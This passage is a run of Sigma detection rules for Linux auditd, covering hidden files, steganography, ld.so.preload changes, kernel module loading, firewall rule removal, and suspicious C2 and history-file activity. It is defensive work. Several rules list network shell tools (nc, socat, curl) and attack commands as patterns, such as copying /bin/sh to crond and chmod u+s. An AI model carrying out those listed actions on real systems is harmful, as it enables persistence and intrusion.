d08722cd-3d09-449a-80b4-83ea2d9d4616 5 | type: similar 6 | status: test 7 | description: Detects calls to hidden files or files located in hidden directories in NIX systems. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md 10 | author: David Burkett, @signalblur 11 | date: 2022/12/30 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1574.001 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | type: 'PATH' 21 | name|contains: '/.' 22 | filter: 23 | name|contains: 24 | - '/.cache/' 25 | - '/.config/' 26 | - '/.pyenv/' 27 | - '/.rustup/toolchains' 28 | condition: selection and not filter 29 | falsepositives: 30 | - Unknown 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_files_directories.yml: -------------------------------------------------------------------------------- 1 | title: Hidden Files and Directories 2 | id: d08722cd-3d09-449a-80b4-83ea2d9d4616 3 | status: test 4 | description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md 7 | author: 'Pawel Mazur' 8 | date: 2021/09/06 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1564.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: 20 | - mkdir 21 | - touch 22 | - vim 23 | - nano 24 | - vi 25 | arguments: 26 | - a1|contains: '/.' 27 | - a1|startswith: '.' 28 | - a2|contains: '/.' 29 | - a2|startswith: '.' 30 | condition: commands and arguments 31 | falsepositives: 32 | - Unknown 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Hide Zip Information in Picture File 2 | id: 45810b50-7edc-42ca-813b-bdac02fb946b 3 | status: test 4 | description: Detects appending of zip file to image 5 | references: 6 | - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/09 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: cat 20 | a1: 21 | a1|endswith: 22 | - '.jpg' 23 | - '.png' 24 | a2: 25 | a2|endswith: '.zip' 26 | condition: commands and a1 and a2 27 | falsepositives: 28 | - Unknown 29 | level: low 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml: -------------------------------------------------------------------------------- 1 | title: Linux Keylogging with Pam.d 2 | id: 49aae26c-450e-448b-911d-b3c13d178dfc 3 | status: test 4 | description: Detect attempt to enable auditing of TTY input 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md 7 | - https://linux.die.net/man/8/pam_tty_audit 8 | - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing 9 | - https://access.redhat.com/articles/4409591#audit-record-types-2 10 | author: 'Pawel Mazur' 11 | date: 2021/05/24 12 | modified: 2022/12/18 13 | tags: 14 | - attack.credential_access 15 | - attack.t1003 16 | - attack.t1056.001 17 | logsource: 18 | product: linux 19 | service: auditd 20 | detection: 21 | selection_path_events: 22 | type: PATH 23 | name: 24 | - '/etc/pam.d/system-auth' 25 | - '/etc/pam.d/password-auth' 26 | selection_tty_events: 27 | type: 28 | - 'TTY' 29 | - 'USER_TTY' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Administrative work 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml: -------------------------------------------------------------------------------- 1 | title: Modification of ld.so.preload 2 | id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 3 | status: test 4 | description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md 7 | - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html 8 | author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community 9 | date: 2019/10/24 10 | modified: 2021/11/27 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1574.006 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'PATH' 20 | name: '/etc/ld.so.preload' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_load_module_insmod.yml: -------------------------------------------------------------------------------- 1 | title: Loading of Kernel Module via Insmod 2 | id: 106d7cbd-80ff-4985-b682-a7043e5acb72 3 | status: test 4 | description: | 5 | Detects loading of kernel modules with insmod command. 6 | Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. 7 | Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md 10 | - https://linux.die.net/man/8/insmod 11 | - https://man7.org/linux/man-pages/man8/kmod.8.html 12 | author: 'Pawel Mazur' 13 | date: 2021/11/02 14 | modified: 2022/12/25 15 | tags: 16 | - attack.persistence 17 | - attack.privilege_escalation 18 | - attack.t1547.006 19 | logsource: 20 | product: linux 21 | service: auditd 22 | detection: 23 | selection: 24 | type: 'SYSCALL' 25 | comm: insmod 26 | exe: /usr/bin/kmod 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_logging_config_change.yml: -------------------------------------------------------------------------------- 1 | title: Logging Configuration Changes on Linux Host 2 | id: c830f15d-6f6e-430f-8074-6f73d6807841 3 | status: test 4 | description: Detect changes of syslog daemons configuration files 5 | references: 6 | - self experience 7 | author: Mikhail Larin, oscd.community 8 | date: 2019/10/25 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.006 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'PATH' 19 | name: 20 | - /etc/syslog.conf 21 | - /etc/rsyslog.conf 22 | - /etc/syslog-ng/syslog-ng.conf 23 | condition: selection 24 | fields: 25 | - exe 26 | - comm 27 | - key 28 | falsepositives: 29 | - Legitimate administrative activity 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_masquerading_crond.yml: -------------------------------------------------------------------------------- 1 | title: Masquerading as Linux Crond Process 2 | id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 3 | status: test 4 | description: | 5 | Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. 6 | Several different variations of this technique have been observed. 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process 9 | author: Timur Zinniatullin, oscd.community 10 | date: 2019/10/21 11 | modified: 2023/08/22 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1036.003 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | type: 'execve' 21 | a0: 'cp' 22 | a1: '/bin/sh' 23 | a2|endswith: '/crond' 24 | condition: selection 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_modify_system_firewall.yml: -------------------------------------------------------------------------------- 1 | title: Modify System Firewall 2 | id: 323ff3f5-0013-4847-bbd4-250b5edb62cc 3 | related: 4 | - id: 53059bc0-1472-438b-956a-7508a94a91f0 5 | type: similar 6 | status: experimental 7 | description: | 8 | Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. 9 | Detection rules that match only on the disabling of firewalls will miss this. 10 | references: 11 | - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html 12 | - https://blog.aquasec.com/container-security-tnt-container-attack 13 | author: IAI 14 | date: 2023/03/06 15 | tags: 16 | - attack.t1562.004 17 | - attack.defense_evasion 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection1: 23 | type: 'EXECVE' 24 | a0: 'iptables' 25 | a1|contains: 'DROP' 26 | selection2: 27 | type: 'EXECVE' 28 | a0: 'firewall-cmd' 29 | a1|contains: 'remove' 30 | selection3: 31 | type: 'EXECVE' 32 | a0: 'ufw' 33 | a1|contains: 'delete' 34 | condition: 1 of selection* 35 | falsepositives: 36 | - Legitimate admin activity 37 | level: medium 38 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_network_service_scanning.yml: -------------------------------------------------------------------------------- 1 | title: Linux Network Service Scanning - Auditd 2 | id: 3761e026-f259-44e6-8826-719ed8079408 3 | related: 4 | - id: 3e102cd9-a70d-4a7a-9508-403963092f31 5 | type: derived 6 | status: test 7 | description: Detects enumeration of local or remote network services. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md 10 | author: Alejandro Ortuno, oscd.community 11 | date: 2020/10/21 12 | modified: 2023/09/26 13 | tags: 14 | - attack.discovery 15 | - attack.t1046 16 | logsource: 17 | product: linux 18 | service: auditd 19 | definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183' 20 | detection: 21 | selection: 22 | type: 'SYSCALL' 23 | exe|endswith: 24 | - '/telnet' 25 | - '/nmap' 26 | - '/netcat' 27 | - '/nc' 28 | - '/ncat' 29 | - '/nc.openbsd' 30 | key: 'network_connect_4' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_network_sniffing.yml: -------------------------------------------------------------------------------- 1 | title: Network Sniffing - Linux 2 | id: f4d3748a-65d1-4806-bd23-e25728081d01 3 | status: test 4 | description: | 5 | Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. 6 | An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md 9 | author: Timur Zinniatullin, oscd.community 10 | date: 2019/10/21 11 | modified: 2022/12/18 12 | tags: 13 | - attack.credential_access 14 | - attack.discovery 15 | - attack.t1040 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection_1: 21 | type: 'execve' 22 | a0: 'tcpdump' 23 | a1: '-c' 24 | a3|contains: '-i' 25 | selection_2: 26 | type: 'execve' 27 | a0: 'tshark' 28 | a1: '-c' 29 | a3: '-i' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Legitimate administrator or user uses network sniffing tool for legitimate reasons. 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd 2 | id: 045b5f9c-49f7-4419-a236-9854fb3c827a 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. 6 | SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. 7 | Microsoft Azure, and Microsoft Operations Management Suite. 8 | references: 9 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 10 | - https://github.com/Azure/Azure-Sentinel/pull/3059 11 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) 12 | date: 2021/09/17 13 | modified: 2022/11/26 14 | tags: 15 | - attack.privilege_escalation 16 | - attack.initial_access 17 | - attack.execution 18 | - attack.t1068 19 | - attack.t1190 20 | - attack.t1203 21 | logsource: 22 | product: linux 23 | service: auditd 24 | detection: 25 | selection: 26 | type: 'SYSCALL' 27 | syscall: 'execve' 28 | uid: 0 29 | cwd: '/var/opt/microsoft/scx/tmp' 30 | comm: 'sh' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_password_policy_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Password Policy Discovery 2 | id: ca94a6db-8106-4737-9ed2-3e3bb826af0a 3 | status: stable 4 | description: Detects password policy discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md 7 | - https://linux.die.net/man/1/chage 8 | - https://man7.org/linux/man-pages/man1/passwd.1.html 9 | - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu 10 | author: Ömer Günal, oscd.community, Pawel Mazur 11 | date: 2020/10/08 12 | modified: 2022/12/18 13 | tags: 14 | - attack.discovery 15 | - attack.t1201 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection_files: 21 | type: 'PATH' 22 | name: 23 | - '/etc/pam.d/common-password' 24 | - '/etc/security/pwquality.conf' 25 | - '/etc/pam.d/system-auth' 26 | - '/etc/login.defs' 27 | selection_chage: 28 | type: 'EXECVE' 29 | a0: 'chage' 30 | a1: 31 | - '--list' 32 | - '-l' 33 | selection_passwd: 34 | type: 'EXECVE' 35 | a0: 'passwd' 36 | a1: 37 | - '-S' 38 | - '--status' 39 | condition: 1 of selection_* 40 | falsepositives: 41 | - Legitimate administration activities 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml: -------------------------------------------------------------------------------- 1 | title: Systemd Service Reload or Start 2 | id: 2625cc59-0634-40d0-821e-cb67382a3dd7 3 | status: test 4 | description: Detects a reload or a start of a service. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.persistence 12 | - attack.t1543.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 'systemctl' 20 | a1|contains: 21 | - 'daemon-reload' 22 | - 'start' 23 | condition: selection 24 | falsepositives: 25 | - Installation of legitimate service. 26 | - Legitimate reconfiguration of service. 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_screencapture_import.yml: -------------------------------------------------------------------------------- 1 | title: Screen Capture with Import Tool 2 | id: dbe4b9c5-c254-4258-9688-d6af0b7967fd 3 | status: test 4 | description: | 5 | Detects adversary creating screen capture of a desktop with Import Tool. 6 | Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. 7 | ImageMagick must be installed. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md 10 | - https://linux.die.net/man/1/import 11 | - https://imagemagick.org/ 12 | author: 'Pawel Mazur' 13 | date: 2021/09/21 14 | modified: 2022/10/09 15 | tags: 16 | - attack.collection 17 | - attack.t1113 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | import: 23 | type: EXECVE 24 | a0: import 25 | import_window_root: 26 | a1: '-window' 27 | a2: 'root' 28 | a3|endswith: 29 | - '.png' 30 | - '.jpg' 31 | - '.jpeg' 32 | import_no_window_root: 33 | a1|endswith: 34 | - '.png' 35 | - '.jpg' 36 | - '.jpeg' 37 | condition: import and (import_window_root or import_no_window_root) 38 | falsepositives: 39 | - Legitimate use of screenshot utility 40 | level: low 41 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml: -------------------------------------------------------------------------------- 1 | title: Screen Capture with Xwd 2 | id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c 3 | status: test 4 | description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture 7 | - https://linux.die.net/man/1/xwd 8 | author: 'Pawel Mazur' 9 | date: 2021/09/13 10 | modified: 2022/12/18 11 | tags: 12 | - attack.collection 13 | - attack.t1113 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: EXECVE 20 | a0: xwd 21 | xwd_root_window: 22 | a1: '-root' 23 | a2: '-out' 24 | a3|endswith: '.xwd' 25 | xwd_no_root_window: 26 | a1: '-out' 27 | a2|endswith: '.xwd' 28 | condition: selection and 1 of xwd_* 29 | falsepositives: 30 | - Legitimate use of screenshot utility 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml: -------------------------------------------------------------------------------- 1 | title: Split A File Into Pieces - Linux 2 | id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769 3 | status: test 4 | description: 'Detection use of the command "split" to split files into parts and possible transfer.' 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/28 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1030 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'SYSCALL' 19 | comm: 'split' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate administrative activity 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Hide Files with Steghide 2 | id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 3 | status: test 4 | description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. 5 | references: 6 | - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/11 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: EXECVE 19 | a0: steghide 20 | a1: embed 21 | a2: 22 | - '-cf' 23 | - '-ef' 24 | a4: 25 | - '-cf' 26 | - '-ef' 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Extract Files with Steghide 2 | id: a5a827d9-1bbe-4952-9293-c59d897eb41b 3 | status: test 4 | description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. 5 | references: 6 | - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/11 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: EXECVE 19 | a0: steghide 20 | a1: extract 21 | a2: '-sf' 22 | a3|endswith: 23 | - '.jpg' 24 | - '.png' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_c2_commands.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious C2 Activities 2 | id: f7158a64-6204-4d6d-868a-6e6378b467e0 3 | status: test 4 | description: | 5 | Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. 6 | This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. 7 | These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) 8 | references: 9 | - https://github.com/Neo23x0/auditd 10 | author: Marie Euler 11 | date: 2020/05/18 12 | modified: 2021/11/27 13 | tags: 14 | - attack.command_and_control 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | key: 'susp_activity' 21 | condition: selection 22 | falsepositives: 23 | - Admin or User activity 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_cmds.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Commands Linux 2 | id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 3 | status: test 4 | description: Detects relevant commands often related to malware or hacking activity 5 | references: 6 | - Internal Research - mostly derived from exploit code including code in MSF 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/12/12 9 | modified: 2022/10/05 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | cmd1: 18 | type: 'EXECVE' 19 | a0: 'chmod' 20 | a1: 777 21 | cmd2: 22 | type: 'EXECVE' 23 | a0: 'chmod' 24 | a1: 'u+s' 25 | cmd3: 26 | type: 'EXECVE' 27 | a0: 'cp' 28 | a1: '/bin/ksh' 29 | cmd4: 30 | type: 'EXECVE' 31 | a0: 'cp' 32 | a1: '/bin/sh' 33 | condition: 1 of cmd* 34 | falsepositives: 35 | - Admin activity 36 | level: medium 37 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_exe_folders.yml: -------------------------------------------------------------------------------- 1 | title: Program Executions in Suspicious Folders 2 | id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc 3 | status: test 4 | description: Detects program executions in suspicious non-program folders related to malware or hacking activity 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2018/01/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.t1587 12 | - attack.t1584 13 | - attack.resource_development 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'SYSCALL' 20 | exe|startswith: 21 | # Temporary folder 22 | - '/tmp/' 23 | # Web server 24 | - '/var/www/' # Standard 25 | - '/home/*/public_html/' # Per-user 26 | - '/usr/local/apache2/' # Classical Apache 27 | - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache 28 | - '/var/apache/' # Solaris Apache 29 | - '/srv/www/' # SuSE Linux 9.* 30 | - '/home/httpd/html/' # Redhat 6 or older Apache 31 | - '/srv/http/' # ArchLinux standard 32 | - '/usr/share/nginx/html/' # ArchLinux nginx 33 | # Data dirs of typically exploited services (incomplete list) 34 | - '/var/lib/pgsql/data/' 35 | - '/usr/local/mysql/data/' 36 | - '/var/lib/mysql/' 37 | - '/var/vsftpd/' 38 | - '/etc/bind/' 39 | - '/var/named/' 40 | condition: selection 41 | falsepositives: 42 | - Admin activity (especially in /tmp folders) 43 | - Crazy web applications 44 | level: medium 45 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious History File Operations - Linux 2 | id: eae8ce9f-bde9-47a6-8e79-f20d18419910 3 | status: test 4 | description: 'Detects commandline operations on shell history files' 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 7 | author: 'Mikhail Larin, oscd.community' 8 | date: 2020/10/17 9 | modified: 2022/11/28 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: EXECVE 19 | history: 20 | - '.bash_history' 21 | - '.zsh_history' 22 | - '.zhistory' 23 | - '.history' 24 | - '.sh_history' 25 | - 'fish_history' 26 | condition: execve and history 27 | fields: 28 | - a0 29 | - a1 30 | - a2 31 | - a3 32 | - key 33 | falsepositives: 34 | - Legitimate administrative activity 35 | - Legitimate software, cleaning hist file 36 | level: medium 37 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_info_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Information Discovery - Auditd 2 | id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 3 | status: test 4 | description: Detects System Information Discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md 7 | author: Pawel Mazur 8 | date: 2021/09/03 9 | modified: 2023/03/06 10 | tags: 11 | - attack.discovery 12 | - attack.t1082 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection_1: 18 | type: PATH 19 | name: 20 | - /etc/lsb-release 21 | - /etc/redhat-release 22 | - /etc/issue 23 | selection_2: 24 | type: EXECVE 25 | a0: 26 | - uname 27 | - uptime 28 | - lsmod 29 | - hostname 30 | - env 31 | selection_3: 32 | type: EXECVE 33 | a0: grep 34 | a1|contains: 35 | - vbox 36 | - vm 37 | - xen 38 | - virtio 39 | - hv 40 | selection_4: 41 | type: EXECVE 42 | a0: kmod 43 | a1: list 44 | condition: 1 of selection_* 45 | falsepositives: 46 | - Likely 47 | level: low 48 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_info_discovery2.yml: -------------------------------------------------------------------------------- 1 | title: System and Hardware Information Discovery 2 | id: 1f358e2e-cb63-43c3-b575-dfb072a6814f 3 | related: 4 | - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 5 | type: derived 6 | status: stable 7 | description: Detects system information discovery commands 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware 10 | author: Ömer Günal, oscd.community 11 | date: 2020/10/08 12 | modified: 2022/11/26 13 | tags: 14 | - attack.discovery 15 | - attack.t1082 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: 'PATH' 22 | name: 23 | - '/sys/class/dmi/id/bios_version' 24 | - '/sys/class/dmi/id/product_name' 25 | - '/sys/class/dmi/id/chassis_vendor' 26 | - '/proc/scsi/scsi' 27 | - '/proc/ide/hd0/model' 28 | - '/proc/version' 29 | - '/etc/*version' 30 | - '/etc/*release' 31 | - '/etc/issue' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate administration activities 35 | level: informational 36 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml: -------------------------------------------------------------------------------- 1 | title: System Shutdown/Reboot - Linux 2 | id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f 3 | status: test 4 | description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/26 10 | tags: 11 | - attack.impact 12 | - attack.t1529 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: 'EXECVE' 19 | shutdowncmd: 20 | - 'shutdown' 21 | - 'reboot' 22 | - 'halt' 23 | - 'poweroff' 24 | init: 25 | - 'init' 26 | - 'telinit' 27 | initselection: 28 | - 0 29 | - 6 30 | condition: execve and (shutdowncmd or (init and initselection)) 31 | falsepositives: 32 | - Legitimate administrative activity 33 | level: informational 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_systemd_service_creation.yml: -------------------------------------------------------------------------------- 1 | title: Systemd Service Creation 2 | id: 1bac86ba-41aa-4f62-9d6b-405eac99b485 3 | status: test 4 | description: Detects a creation of systemd services which could be used by adversaries to execute malicious code. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md 7 | author: 'Pawel Mazur' 8 | date: 2022/02/03 9 | modified: 2022/02/06 10 | tags: 11 | - attack.persistence 12 | - attack.t1543.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | path: 18 | type: 'PATH' 19 | nametype: 'CREATE' 20 | name_1: 21 | name|startswith: 22 | - '/usr/lib/systemd/system/' 23 | - '/etc/systemd/system/' 24 | name_2: 25 | name|contains: '/.config/systemd/user/' 26 | condition: path and 1 of name_* 27 | falsepositives: 28 | - Admin work like legit service installs. 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml: -------------------------------------------------------------------------------- 1 | title: Unix Shell Configuration Modification 2 | id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d 3 | related: 4 | - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 5 | type: obsoletes 